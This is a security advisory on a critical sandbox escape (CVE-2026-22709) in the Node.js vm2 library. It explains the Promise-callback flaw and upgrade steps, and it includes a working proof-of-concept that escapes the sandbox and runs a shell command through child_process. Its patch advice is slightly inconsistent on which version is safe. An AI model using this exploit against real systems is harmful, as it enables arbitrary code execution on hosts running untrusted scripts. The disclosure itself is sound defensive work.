Advisory

Critical Sandbox Escape in vm2 Library Allows Remote Code Execution

Take action: If you're using the vm2 library for Node.js, immediately update to version 3.10.3 to fix CVE-2026-22709 - version 3.10.1 is NOT safe. If you can't update right away, stop running any untrusted code through vm2 or switch to stronger isolation methods like containers.


Learn More

The vm2 library for Node.js is reported to contain a critical sandbox escape flaw that lets attackers break out of isolated environments and run untrusted code on the host server. The issue is a major risk for any application that uses vm2 to execute user-supplied scripts, such as SaaS platforms, code runners, and chatbots.

The flaw is tracked as CVE-2026-22709 (CVSS score 9.8) and is caused by improper sanitization of callbacks attached to global Promises. While the library sanitizes its own internal Promise implementation, async functions return global Promises that bypass these checks. Attackers can use this gap to reach host objects outside the sandbox and escape it.

By catching a specific error, the attacker can reach the host's Function constructor. This lets them load the child_process module and run shell commands with the same permissions as the Node.js process, which breaks every isolation guarantee the library provides.

This exploit example creates an async function that returns a global Promise. The catch handler accesses the unsanitized constructor chain to reach the Function constructor, enabling arbitrary command execution and complete sandbox escape.

const { VM } = require("vm2");

const exploit = `
const error = new Error();
error.name = Symbol();
const f = async () => error.stack;
f().catch(e => {
    const Function = e.constructor.constructor;
    Function("process.mainModule.require('child_process').execSync('whoami')")();
});
`;

new VM().run(exploit);

The vm2 project was previously shut down in 2023 due to many security bugs but was restarted in late 2025. Despite its history of vulnerabilities, the library remains popular with nearly one million downloads every week on the npm platform. 

Developers must update to version 3.10.2 or 3.10.3 immediately to fix this issue. Version 3.10.1 only partially addressed the bug, leaving systems at risk. If you cannot update, you should stop running untrusted code or move to a more secure isolation method like hardware-level virtualization or containers.
